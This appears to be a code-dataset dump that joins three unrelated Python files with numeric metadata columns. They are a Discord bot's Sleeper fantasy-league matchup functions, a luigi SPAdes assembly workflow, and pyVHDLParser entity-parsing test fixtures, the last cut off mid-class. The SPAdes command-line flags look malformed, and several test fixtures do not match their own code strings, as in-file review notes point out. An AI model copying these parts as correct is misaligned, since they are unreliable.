    matchups = sleeper_wrapper.League(int(league_id)).get_matchups(int(week))
    if not matchups:
        return 'There are no matchups this week, try this command again during the season!'
    # Sort pairs together; rosters without a matchup_id sort last and are skipped.
    sorted_matchups = sorted(matchups, key=lambda m: (m["matchup_id"] is None, m["matchup_id"]))
    matchups_string = ''
    count = 0
    matchup_count = 1
    for matchup in sorted_matchups:
        if matchup["matchup_id"] is None:
            continue
        count += 1
        roster = next((r for r in rosters if r["roster_id"] == matchup["roster_id"]), None)
        # NOTE(review): if no roster/user matches, `roster`/`user` are None and
        # the subscripts below raise — same as the original; confirm the API
        # guarantees a match.
        user = next((u for u in users if u["user_id"] == roster["owner_id"]), None)
        if count % 2 == 0:
            # Second team of the pair completes the line.
            matchup_count += 1
            matchups_string += f'{user["display_name"]}\n'
        else:
            matchups_string += f'{matchup_count}. {user["display_name"]} vs. '
    return functions.my_embed('Current Week Matchups', f'Matchups for Week {week}', discord.Colour.blue(), 'Matchups', matchups_string, False, bot)
def my_league_scoreboard(ctx, bot, week):
    """Build a Discord embed with scores for each matchup of a given week.

    Parameters:
        ctx: command context; must originate from a guild (not a DM).
        bot: bot instance, forwarded to functions.my_embed.
        week: week number as a string; must be numeric and within 1-18.

    Returns:
        A discord embed, or a plain error string on validation failure.
    """
    # Guard clauses replace the original deep nesting (mirrors my_league_matchups).
    if ctx.guild is None:
        return 'This command is only available when sent in a guild rather than a DM. Try again there.'
    if not week.isnumeric() or not 1 <= int(week) <= 18:
        return 'Invalid week number given. Choose a valid week between 1 and 18.'
    existing_league = functions.get_existing_league(ctx)
    if not existing_league or "league" not in existing_league:
        return 'Please run add-league command, no Sleeper League connected.'
    league_id = existing_league["league"]
    users = sleeper_wrapper.League(int(league_id)).get_users()
    rosters = sleeper_wrapper.League(int(league_id)).get_rosters()
    matchups = sleeper_wrapper.League(int(league_id)).get_matchups(int(week))
    if not matchups:
        return 'There are no matchups this week, try this command again during the season!'
    sorted_matchups = sorted(matchups, key=lambda m: (m["matchup_id"] is None, m["matchup_id"]))
    scoreboard_string = ''
    count = 0
    matchup_count = 1
    for matchup in sorted_matchups:
        if matchup["matchup_id"] is None:
            continue
        count += 1
        roster = next((r for r in rosters if r["roster_id"] == matchup["roster_id"]), None)
        user = next((u for u in users if u["user_id"] == roster["owner_id"]), None)
        if count % 2 == 0:
            # Second team of the pair closes the scoreboard line.
            matchup_count += 1
            scoreboard_string += f'{user["display_name"]} - {matchup["points"]}\n'
        else:
            scoreboard_string += f'{matchup_count}. {user["display_name"]} - {matchup["points"]} / '
    return functions.my_embed(f'Week {week} Scoreboard', f'Scoreboard for Week {str(week)}', discord.Colour.blue(), 'Scoreboard', scoreboard_string, False, bot)
| 61.484277
| 231
| 0.538973
| 1,064
| 9,776
| 4.804511
| 0.12218
| 0.065728
| 0.043036
| 0.049491
| 0.809859
| 0.778365
| 0.772887
| 0.74687
| 0.701291
| 0.672731
| 0
| 0.005797
| 0.364771
| 9,776
| 159
| 232
| 61.484277
| 0.817391
| 0
| 0
| 0.706667
| 0
| 0.006667
| 0.258259
| 0.023831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026667
| false
| 0.026667
| 0.033333
| 0
| 0.086667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bf6a55c0a6261df53f9a7237bf612e3a0d5beac
| 4,828
|
py
|
Python
|
spades-wf.py
|
BiobankLab/spades-wf
|
53a7706b145e3b0342b51a7698f96af45c710cba
|
[
"Apache-2.0"
] | null | null | null |
spades-wf.py
|
BiobankLab/spades-wf
|
53a7706b145e3b0342b51a7698f96af45c710cba
|
[
"Apache-2.0"
] | null | null | null |
spades-wf.py
|
BiobankLab/spades-wf
|
53a7706b145e3b0342b51a7698f96af45c710cba
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import luigi
import subprocess
from fatool import *
# If the "clear" flag is set, clear_cut runs as the first task in the workflow.
class clear_cut(luigi.Task):
    """Luigi task that drops reads shorter than ``minlen`` from every sample file.

    For each input file ``name.ext`` listed under ``param['samples']`` it
    writes a filtered copy named ``name_cleared.ext`` next to the original.
    """
    param = luigi.DictParameter()

    def requires(self):
        # First task of the workflow: no upstream dependencies.
        return []

    def run(self):
        for sample in self.param['samples']:
            for path in sample['files']:
                fa = Fa.load_from_file(path)
                # BUG FIX: original line was missing the closing parenthesis.
                cleared = fa.cut_min_len(self.param['minlen'])
                # BUG FIX: split on '.' (extension separator), not ',' —
                # matches the path handling in the spades tasks below.
                base, ext = path.rsplit('.', 1)
                cleared.write(base + '_cleared.' + ext)

    def output(self):
        targets = []
        for sample in self.param['samples']:
            for path in sample['files']:
                # BUG FIX: same '.'-split and missing-parenthesis fixes as run().
                base, ext = path.rsplit('.', 1)
                targets.append(luigi.LocalTarget(base + '_cleared.' + ext))
        return targets
class spades(luigi.Task):
    """Luigi task that runs SPAdes on every sample after clear_cut filtering.

    Builds the shared CLI parameter list from ``param['params']``, appends the
    per-sample cleared input files, and invokes ``spades.py`` once per sample.
    """
    param = luigi.DictParameter()

    def requires(self):
        # Inputs must be length-filtered first.
        return [clear_cut(self.param)]

    def run(self):
        params = []
        # Preparing params to call SPAdes — the same list is reused for every run.
        for r in self.param['params']:
            if 'value' in r:
                params += [r['name'], r['value']]
            else:
                params.append(r['name'].strip())
        if 'output' in self.param:
            output = self.param['output'].rstrip(' /')
        else:
            output = ''
        # Preparing input-file arguments; pe (paired-end) vs s (single) matters.
        for r in self.param['samples']:
            q = 1
            files = []
            if r['type'] == 'pe':
                # Paired-end: alternate mate numbering 1/2 across the file list.
                # NOTE(review): 'pe-1-<q>' does not look like a standard SPAdes
                # option (--pe1-1 / --pe1-2) — confirm intended flag spelling.
                for f in r['files']:
                    base, ext = f.rsplit('.', 1)
                    files += ['pe-1-' + str(q), base + '_cleared.' + ext]
                    q = 2 if q == 1 else 1
            elif r['type'] == 's':
                # Single reads: s1, s2, ... per file.
                for f in r['files']:
                    base, ext = f.rsplit('.', 1)
                    files += ['s' + str(q), base + '_cleared.' + ext]
                    q += 1
            # BUG FIX: output flag was '-0' (digit zero); SPAdes expects '-o'.
            subprocess.call(['python', self.param['path2spades'] + 'spades.py'] + params + files + ['-o', output + '/' + r['name'].replace(' ', '_')])
    '''
    python spades.py -k 21,33,55,77,99 --careful --s1 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L001_R1_001_trimmed.fq --s2 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L002_R1_001_trimmed.fq --s3 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L003_R1_001_trimmed.fq --s4 /media/blul/HS/FASTQ/Genomy/Bakteriofagi/ZIB_UL/72A/TRIM/72-A_S17_L004_R1_001_trimmed.fq -o ../72-A_run -t 32
    '''

    def output(self):
        if 'output' in self.param:
            out_dir = self.param['output'].rstrip(' /')
        else:
            out_dir = ''
        # CONSISTENCY FIX: run() writes to r['name'].replace(' ', '_'); the
        # targets must use the same directory name or luigi never sees them done.
        return [luigi.LocalTarget(out_dir + '/' + r['name'].replace(' ', '_') + '/contigs.fasta')
                for r in self.param['samples']]
class single_spades(luigi.Task):
    """Luigi task that runs SPAdes directly on pre-cleared inputs.

    Identical to the ``spades`` task except it has no clear_cut dependency:
    the ``*_cleared.*`` files are assumed to exist already.
    """
    param = luigi.DictParameter()

    def requires(self):
        # Standalone variant: no upstream clear_cut task.
        return []

    def run(self):
        params = []
        # Preparing params to call SPAdes — the same list is reused for every run.
        for r in self.param['params']:
            if 'value' in r:
                params += [r['name'], r['value']]
            else:
                params.append(r['name'].strip())
        if 'output' in self.param:
            output = self.param['output'].rstrip(' /')
        else:
            output = ''
        # Preparing input-file arguments; pe (paired-end) vs s (single) matters.
        for r in self.param['samples']:
            q = 1
            files = []
            if r['type'] == 'pe':
                # Paired-end: alternate mate numbering 1/2 across the file list.
                # NOTE(review): 'pe-1-<q>' does not look like a standard SPAdes
                # option (--pe1-1 / --pe1-2) — confirm intended flag spelling.
                for f in r['files']:
                    base, ext = f.rsplit('.', 1)
                    files += ['pe-1-' + str(q), base + '_cleared.' + ext]
                    q = 2 if q == 1 else 1
            elif r['type'] == 's':
                # Single reads: s1, s2, ... per file.
                for f in r['files']:
                    base, ext = f.rsplit('.', 1)
                    files += ['s' + str(q), base + '_cleared.' + ext]
                    q += 1
            # BUG FIX: output flag was '-0' (digit zero); SPAdes expects '-o'.
            subprocess.call(['python', self.param['path2spades'] + 'spades.py'] + params + files + ['-o', output + '/' + r['name'].replace(' ', '_')])

    def output(self):
        if 'output' in self.param:
            out_dir = self.param['output'].rstrip(' /')
        else:
            out_dir = ''
        # CONSISTENCY FIX: match run(), which replaces spaces with underscores.
        return [luigi.LocalTarget(out_dir + '/' + r['name'].replace(' ', '_') + '/contigs.fasta')
                for r in self.param['samples']]
| 34.733813
| 450
| 0.46251
| 562
| 4,828
| 3.870107
| 0.197509
| 0.082759
| 0.06069
| 0.036782
| 0.833563
| 0.826667
| 0.826667
| 0.805517
| 0.805517
| 0.805517
| 0
| 0.036051
| 0.385253
| 4,828
| 138
| 451
| 34.985507
| 0.696766
| 0
| 0
| 0.873786
| 0
| 0
| 0.093317
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.029126
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ecfcc76dc64fe047443e9f837036f5f836ec2372
| 20,863
|
py
|
Python
|
tests/unit/SimpleBlockSequences/Entity.py
|
Xiretza/pyVHDLParser
|
23ddd633b45f68967fbfa860e1d04fd6d0aa4659
|
[
"Apache-2.0"
] | 55
|
2016-09-21T15:11:21.000Z
|
2022-03-08T11:14:38.000Z
|
tests/unit/SimpleBlockSequences/Entity.py
|
Xiretza/pyVHDLParser
|
23ddd633b45f68967fbfa860e1d04fd6d0aa4659
|
[
"Apache-2.0"
] | 27
|
2017-04-01T13:47:16.000Z
|
2022-01-17T14:37:16.000Z
|
tests/unit/SimpleBlockSequences/Entity.py
|
Xiretza/pyVHDLParser
|
23ddd633b45f68967fbfa860e1d04fd6d0aa4659
|
[
"Apache-2.0"
] | 15
|
2016-10-18T22:25:24.000Z
|
2021-12-01T18:04:33.000Z
|
from textwrap import dedent
from unittest import TestCase
from pyVHDLParser.Token import WordToken, StartOfDocumentToken, SpaceToken, CharacterToken, EndOfDocumentToken, LinebreakToken, IndentationToken
from pyVHDLParser.Blocks import StartOfDocumentBlock, EndOfDocumentBlock
from pyVHDLParser.Blocks.Common import WhitespaceBlock, LinebreakBlock, IndentationBlock
from pyVHDLParser.Blocks.Structural import Entity
from pyVHDLParser.Blocks.List import GenericList
from tests.unit.Common import Initializer, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence, BlockSequenceWithParserError, ExpectedTokenStream, ExpectedBlockStream, TokenLinking
if __name__ == "__main__":
    # This module only declares testcases and must be run via the test runner.
    print("ERROR: you called a testcase declaration file as an executable module.")
    # BUG FIX: user-facing typo 'unitest' -> 'unittest'.
    print("Use: 'python -m unittest <testcase module>'")
    exit(1)
def setUpModule():
    """Module-level unittest hook: build the shared Initializer once."""
    Initializer()
class SimpleEntity_OneLine_OnlyEnd(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""Expected tokens/blocks for a one-line entity with a bare ``end;``."""
	code = "entity e is end;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(WordToken, "is"),
			(SpaceToken, " "),
			(WordToken, "end"),
			(CharacterToken, ";"),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity e is"),       # entity e is
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "end;"),               # end;
			(EndOfDocumentBlock, None)               #
		]
	)
class SimpleEntity_OneLine_EndWithKeyword(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""Expected tokens/blocks for a one-line entity ending ``end entity;``."""
	code = "entity e is end entity;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),            #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(SpaceToken, " "),                       #
			(WordToken, "is"),                       # is
			(SpaceToken, " "),                       #
			(WordToken, "end"),                      # end
			(SpaceToken, " "),                       #
			(WordToken, "entity"),                   # entity
			(CharacterToken, ";"),                   # ;
			(EndOfDocumentToken, None)               #
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity e is"),       # entity e is
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "end entity;"),        # end entity;
			(EndOfDocumentBlock, None)               #
		],
	)
class SimpleEntity_OneLine_EndWithName(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""Expected tokens/blocks for a one-line entity ending ``end e;``."""
	code = "entity e is end e;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),            #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(SpaceToken, " "),                       #
			(WordToken, "is"),                       # is
			(SpaceToken, " "),                       #
			(WordToken, "end"),                      # end
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(CharacterToken, ";"),                   # ;
			(EndOfDocumentToken, None)               #
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity e is"),       # entity e is
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "end e;"),             # end e;
			(EndOfDocumentBlock, None)               #
		]
	)
class SimpleEntity_OneLine_EndWithKeywordAndName(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""Expected tokens/blocks for a one-line entity ending ``end entity e;``."""
	code = "entity e is end entity e;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),            #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(SpaceToken, " "),                       #
			(WordToken, "is"),                       # is
			(SpaceToken, " "),                       #
			(WordToken, "end"),                      # end
			(SpaceToken, " "),                       #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(CharacterToken, ";"),                   # ;
			(EndOfDocumentToken, None)               #
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity e is"),       # entity e is
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "end entity e;"),      # end entity e;
			(EndOfDocumentBlock, None)               #
		]
	)
class SimpleEntity_OneLine_NoName_EndWithKeywordAndName(TestCase, ExpectedDataMixin, TokenLinking, TokenSequence, BlockSequenceWithParserError):
	"""Malformed input (entity name missing): parser error expected at block level."""
	code = "entity is end entity e;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),            #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "is"),                       # is
			(SpaceToken, " "),                       #
			(WordToken, "end"),                      # end
			(SpaceToken, " "),                       #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(CharacterToken, ";"),                   # ;
			(EndOfDocumentToken, None)               #
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity is"),         # entity is
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "end entity e;"),      # end entity e;
			(EndOfDocumentBlock, None)               #
		]
	)
class SimpleEntity_OneLine_NoIs_EndWithKeywordAndName(TestCase, ExpectedDataMixin, TokenLinking, TokenSequence, BlockSequenceWithParserError):
	"""Malformed input (``is`` keyword missing): parser error expected at block level."""
	code = "entity e end entity e;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),            #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(SpaceToken, " "),                       #
			(WordToken, "end"),                      # end
			(SpaceToken, " "),                       #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(CharacterToken, ";"),                   # ;
			(EndOfDocumentToken, None)               #
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity e"),          # entity e
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "end entity e;"),      # end entity e;
			(EndOfDocumentBlock, None)               #
		]
	)
class SimpleEntity_OneLine_NoEnd_EndWithKeywordAndName(TestCase, ExpectedDataMixin, TokenLinking, TokenSequence, BlockSequenceWithParserError):
	"""Malformed input (``end`` keyword missing): parser error expected at block level."""
	code = "entity e is entity e;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),            #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(SpaceToken, " "),                       #
			(WordToken, "is"),                       # is
			(SpaceToken, " "),                       #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(CharacterToken, ";"),                   # ;
			(EndOfDocumentToken, None)               #
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity e is"),       # entity e is
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "entity e;"),          # entity e;
			(EndOfDocumentBlock, None)               #
		]
	)
class SimpleEntity_OneLine_EndWithKeywordAndName_WrongName(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""End label ``a`` does not match entity name ``e`` — still tokenizes/blocks cleanly."""
	code = "entity e is end entity a;"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),            #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "e"),                        # e
			(SpaceToken, " "),                       #
			(WordToken, "is"),                       # is
			(SpaceToken, " "),                       #
			(WordToken, "end"),                      # end
			(SpaceToken, " "),                       #
			(WordToken, "entity"),                   # entity
			(SpaceToken, " "),                       #
			(WordToken, "a"),                        # a
			(CharacterToken, ";"),                   # ;
			(EndOfDocumentToken, None)               #
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),            #
			(Entity.NameBlock, "entity e is"),       # entity e is
			(WhitespaceBlock, " "),                  #
			(Entity.EndBlock, "end entity a;"),      # end entity a;
			(EndOfDocumentBlock, None)               #
		]
	)
class SimpleEntity_MultiLine_LongForm(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""Two-line long-form entity with linebreak tokens/blocks between sections."""
	code = dedent("""\
		entity e is
		end entity e ;
		""")
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(WordToken, "is"),
			(LinebreakToken, "\n"),
			(WordToken, "end"),
			(SpaceToken, " "),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(CharacterToken, ";"),
			(LinebreakToken, "\n"),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),
			(Entity.NameBlock, "entity e is"),
			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "end entity e ;"),
			(LinebreakBlock, "\n"),
			(EndOfDocumentBlock, None)
		]
	)
class SimpleEntity_AllLine_LongForm(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""One word per line: linebreaks are absorbed into the surrounding blocks."""
	code = "entity\ne\nis\nend\nentity\ne\n;\n"
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(LinebreakToken, "\n"),
			(WordToken, "e"),
			(LinebreakToken, "\n"),
			(WordToken, "is"),
			(LinebreakToken, "\n"),
			(WordToken, "end"),
			(LinebreakToken, "\n"),
			(WordToken, "entity"),
			(LinebreakToken, "\n"),
			(WordToken, "e"),
			(LinebreakToken, "\n"),
			(CharacterToken, ";"),
			(LinebreakToken, "\n"),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),
			(Entity.NameBlock, "entity"),
			(LinebreakBlock, "\n"),
#			(IndentationBlock, "\t"),
			(Entity.NameBlock, "e"),
			(LinebreakBlock, "\n"),
			(Entity.NameBlock, "is"),
			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "end\n"),
#			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "entity\n"),
#			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "e\n"),
#			(LinebreakBlock, "\n"),
			(Entity.EndBlock, ";"),
			(LinebreakBlock, "\n"),
			(EndOfDocumentBlock, None)
		]
	)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric(TestCase, ExpectedDataMixin, LinkingTests, TokenSequence, BlockSequence):
	"""Well-formed entity with one generic: exercises GenericList open/item/close blocks."""
	code = dedent("""\
		entity e is
			generic (
				G : integer
			);
		end entity e;
		""")
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(WordToken, "is"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(WordToken, "generic"),
			(SpaceToken, " "),
			(CharacterToken, "("),
			(LinebreakToken, None),
			(IndentationToken, "\t\t"),
			(WordToken, "G"),
			(SpaceToken, " "),
			(CharacterToken, ":"),
			(SpaceToken, " "),
			(WordToken, "integer"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(CharacterToken, ")"),
			(CharacterToken, ";"),
			(LinebreakToken, None),
			(WordToken, "end"),
			(SpaceToken, " "),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(CharacterToken, ";"),
			(LinebreakToken, None),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),
			(Entity.NameBlock, "entity e is"),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t"),
			(GenericList.OpenBlock, "generic ("),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t\t"),
			(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
			(LinebreakBlock, "\n"),
			(GenericList.GenericListInterfaceConstantBlock, "\t"),
			(GenericList.CloseBlock, ");"),
			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "end entity e;"),
			(LinebreakBlock, "\n"),
			(EndOfDocumentBlock, None)
		]
	)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_NoGenericKeyword(TestCase, ExpectedDataMixin, TokenLinking, BlockSequenceWithParserError):
	"""Malformed input (``generic`` keyword missing): parser error expected.

	NOTE(review): ``code`` ends with ``end entity e;`` but the tokenStream
	expects ``(WordToken, "a")`` and omits the final LinebreakToken that the
	trailing newline in ``code`` should produce (compare the well-formed
	sibling class above) — confirm whether this fixture is stale.
	NOTE(review): blockStream still lists ``generic (`` blocks although the
	keyword is absent from ``code``; presumably unused because this class
	uses BlockSequenceWithParserError — verify.
	"""
	code = dedent("""\
		entity e is
			(
				G : integer
			);
		end entity e;
		""")
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(WordToken, "is"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(CharacterToken, "("),
			(LinebreakToken, None),
			(IndentationToken, "\t\t"),
			(WordToken, "G"),
			(SpaceToken, " "),
			(CharacterToken, ":"),
			(SpaceToken, " "),
			(WordToken, "integer"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(CharacterToken, ")"),
			(CharacterToken, ";"),
			(LinebreakToken, None),
			(WordToken, "end"),
			(SpaceToken, " "),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "a"),
			(CharacterToken, ";"),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),
			(Entity.NameBlock, "entity e is"),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t"),
			(GenericList.OpenBlock, "generic ("),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t\t"),
			(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
			(LinebreakBlock, "\n"),
			(GenericList.GenericListInterfaceConstantBlock, "\t"),
			(GenericList.CloseBlock, ");"),
			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "end entity e;"),
			(LinebreakBlock, "\n"),
			(EndOfDocumentBlock, None)
		]
	)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_NoOpeningRoundBracket(TestCase, ExpectedDataMixin, TokenLinking):
	"""Malformed input (no ``(`` after ``generic``): token-linking only.

	NOTE(review): ``code`` ends with ``end entity e;`` but the tokenStream
	expects ``(WordToken, "a")`` and omits the final LinebreakToken — confirm
	whether this fixture is stale. blockStream appears unused here (the class
	mixes in TokenLinking only) and still lists the well-formed blocks.
	"""
	code = dedent("""\
		entity e is
			generic
				G : integer
			);
		end entity e;
		""")
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(WordToken, "is"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(WordToken, "generic"),
			(LinebreakToken, None),
			(IndentationToken, "\t\t"),
			(WordToken, "G"),
			(SpaceToken, " "),
			(CharacterToken, ":"),
			(SpaceToken, " "),
			(WordToken, "integer"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(CharacterToken, ")"),
			(CharacterToken, ";"),
			(LinebreakToken, None),
			(WordToken, "end"),
			(SpaceToken, " "),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "a"),
			(CharacterToken, ";"),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),
			(Entity.NameBlock, "entity e is"),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t"),
			(GenericList.OpenBlock, "generic ("),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t\t"),
			(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
			(LinebreakBlock, "\n"),
			(GenericList.GenericListInterfaceConstantBlock, "\t"),
			(GenericList.CloseBlock, ");"),
			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "end entity e;"),
			(LinebreakBlock, "\n"),
			(EndOfDocumentBlock, None)
		]
	)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_NoClosingRoundBracket(TestCase, ExpectedDataMixin, TokenLinking):
	"""Malformed input (no ``)`` closing the generic list): token-linking only.

	NOTE(review): ``code`` ends with ``end entity e;`` but the tokenStream
	expects ``(WordToken, "a")`` and omits the final LinebreakToken — confirm
	whether this fixture is stale. blockStream appears unused (TokenLinking
	only) and still lists the well-formed blocks including ``);``.
	"""
	code = dedent("""\
		entity e is
			generic (
				G : integer
			;
		end entity e;
		""")
	tokenStream = ExpectedTokenStream(
		[ (StartOfDocumentToken, None),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "e"),
			(SpaceToken, " "),
			(WordToken, "is"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(WordToken, "generic"),
			(SpaceToken, " "),
			(CharacterToken, "("),
			(LinebreakToken, None),
			(IndentationToken, "\t\t"),
			(WordToken, "G"),
			(SpaceToken, " "),
			(CharacterToken, ":"),
			(SpaceToken, " "),
			(WordToken, "integer"),
			(LinebreakToken, None),
			(IndentationToken, "\t"),
			(CharacterToken, ";"),
			(LinebreakToken, None),
			(WordToken, "end"),
			(SpaceToken, " "),
			(WordToken, "entity"),
			(SpaceToken, " "),
			(WordToken, "a"),
			(CharacterToken, ";"),
			(EndOfDocumentToken, None)
		]
	)
	blockStream = ExpectedBlockStream(
		[ (StartOfDocumentBlock, None),
			(Entity.NameBlock, "entity e is"),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t"),
			(GenericList.OpenBlock, "generic ("),
			(LinebreakBlock, "\n"),
			(IndentationBlock, "\t\t"),
			(GenericList.GenericListInterfaceConstantBlock, "G : integer"),
			(LinebreakBlock, "\n"),
			(GenericList.GenericListInterfaceConstantBlock, "\t"),
			(GenericList.CloseBlock, ");"),
			(LinebreakBlock, "\n"),
			(Entity.EndBlock, "end entity e;"),
			(LinebreakBlock, "\n"),
			(EndOfDocumentBlock, None)
		]
	)
class SimpleEntity_MultiLine_LongForm_WithSingleGeneric_TypoInGeneric(TestCase, ExpectedDataMixin, TokenLinking, BlockSequenceWithParserError):
	"""Malformed input (``gen`` instead of ``generic``): parser error expected.

